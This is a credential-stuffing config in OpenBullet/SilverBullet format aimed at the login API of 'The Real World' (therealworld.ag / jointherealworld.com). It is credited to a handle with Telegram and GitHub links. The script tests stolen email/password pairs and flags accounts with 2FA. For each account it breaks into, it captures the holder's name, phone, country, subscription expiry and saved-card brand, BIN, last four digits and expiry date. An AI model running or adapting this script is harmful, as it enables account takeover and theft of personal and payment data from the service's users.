[SETTINGS]
{
  "Name": "HustlersUni",
  "SuggestedBots": 100,
  "MaxCPM": 0,
  "LastModified": "2024-09-01T03:33:33.3333333-07:00",
  "AdditionalInfo": "github.com/0xSums",
  "RequiredPlugins": [],
  "Author": "✧",
  "Version": "[t.me/imSums]"
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "TheRealWorld",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
#/auth/session/login REQUEST POST "https://api.therealworld.ag/auth/session/login" 
  CONTENT "{\"email\":\"<USER>\",\"password\":\"<PASS>\",\"friendly_name\":\"chrome on Windows\",\"device_id\":\"\",\"device_type\":\"Desktop\"}" 
  CONTENTTYPE "application/json" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: application/json, text/plain, */*" 

#200_OK? KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "<RESPONSECODE>" EqualTo "401" 
    KEY "<RESPONSECODE>" EqualTo "500" 
    KEY "<RESPONSECODE>" EqualTo "400" 
  KEYCHAIN Success OR 
    KEY "<RESPONSECODE>" EqualTo "200" 
  KEYCHAIN Custom "2FACTOR" OR 
    KEY "{\"result\":\"MFA\"," 

#user_id PARSE "<SOURCE>" JSON "user_id" -> VAR "UID" 

#token PARSE "<SOURCE>" JSON "token" -> VAR "XST" 

#/users/@me REQUEST GET "https://api.therealworld.ag/users/@me" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: application/json, text/plain, */*" 
  HEADER "X-Client-Version: 2.4.138" 
  HEADER "X-Session-Token: <XST>" 

#username PARSE "<SOURCE>" JSON "username" CreateEmpty=FALSE -> CAP "User" 

#/realworld/hu2_auth REQUEST POST "https://api.therealworld.ag/realworld/hu2_auth" 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: application/json, text/plain, */*" 
  HEADER "X-Client-Version: 2.4.138" 
  HEADER "X-Session-Token: <XST>" 

#token PARSE "<SOURCE>" JSON "token" -> VAR "JWT" 

#/api/subscription REQUEST GET "https://secure.jointherealworld.com/api/subscription" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: application/json, text/plain, */*" 
  HEADER "X-Access-Token: <JWT>" 

#currentPeriodEndAt PARSE "<SOURCE>" JSON "currentPeriodEndAt" -> VAR "T1" 

#expiryMonth PARSE "<T1>" LR "" "/" -> VAR "EM" 

#currentPeriodEndAt PARSE "<T1>" LR "/" "" -> VAR "T2" 

#expiryDay PARSE "<T2>" LR "" "/" -> VAR "ED" 

#expiryYear PARSE "<T2>" LR "/" " " -> VAR "EY" 

#first_name PARSE "<SOURCE>" JSON "first_name" -> VAR "FN" 

#last_name PARSE "<SOURCE>" JSON "last_name" -> VAR "LN" 

#fullName FUNCTION Constant "<FN> <LN>" -> CAP "Name" 

#phone PARSE "<SOURCE>" JSON "phone" CreateEmpty=FALSE -> CAP "Phone" 

#country PARSE "<SOURCE>" JSON "country" CreateEmpty=FALSE -> CAP "Country" 

#/api/payment-method/list REQUEST POST "https://secure.jointherealworld.com/api/payment-method/list" 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: application/json, text/plain, */*" 
  HEADER "X-Access-Token: <JWT>" 

#$? KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Custom "CUSTOM" AND 
    KEY "\"paymentMethods\":[]" 
    KEY "<EY>" LessThan "2024" 
    KEY "<EM>" LessThan "8" 
  KEYCHAIN Custom "CUSTOM" OR 
    KEY "<EY>" LessThan "2024" 
    KEY "\"paymentMethods\":[]" 
  KEYCHAIN Retry OR 
    KEY "<RESPONSECODE>" EqualTo "502" 

#Expiry FUNCTION Constant "<EM>/<ED>/<EY>" -> CAP "PlanExpires" 

#brand PARSE "<SOURCE>" JSON "brand" -> VAR "CC" 

#Card(s) FUNCTION ToUppercase "<CC>" -> VAR "CC" 

#last4 PARSE "<SOURCE>" JSON "last4" -> VAR "L4" 

#bin PARSE "<SOURCE>" JSON "bin" -> VAR "BIN" 

#month PARSE "<SOURCE>" JSON "month" -> VAR "ExpMo" 

#year PARSE "<SOURCE>" JSON "year" -> VAR "ExpYr" 

#Payment FUNCTION Constant "<CC> <BIN>***<L4> <ExpMo>/<ExpYr>" -> CAP "SavedCard" 

#Expired? KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Custom "CUSTOM" OR 
    KEY "<EY>" LessThan "2024" 
    KEY "<EM>" LessThan "8" 
  KEYCHAIN Failure AND 
    KEY "<PlanExpires>" EqualTo "//" 
    KEY "<SavedCard>" EqualTo "*** /" 

